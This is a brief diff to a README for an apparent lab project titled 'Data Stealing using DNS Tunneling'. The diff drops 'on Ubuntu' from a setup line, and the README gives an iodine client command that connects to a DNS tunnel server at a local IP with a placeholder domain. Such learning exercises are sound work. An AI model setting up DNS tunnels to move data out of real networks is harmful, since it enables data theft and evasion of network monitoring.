laxmiyamkolu/Data-Stealing-using-DNS-Tunneling/README.md

 **Setup the DNS Client:**

-Configured the client on Ubuntu to connect to the DNS server using iodine.
+Configured the client to connect to the DNS server using iodine.

 Command: **sudo iodine -f -P password -T A 192.168.1.1 fake-domain.org**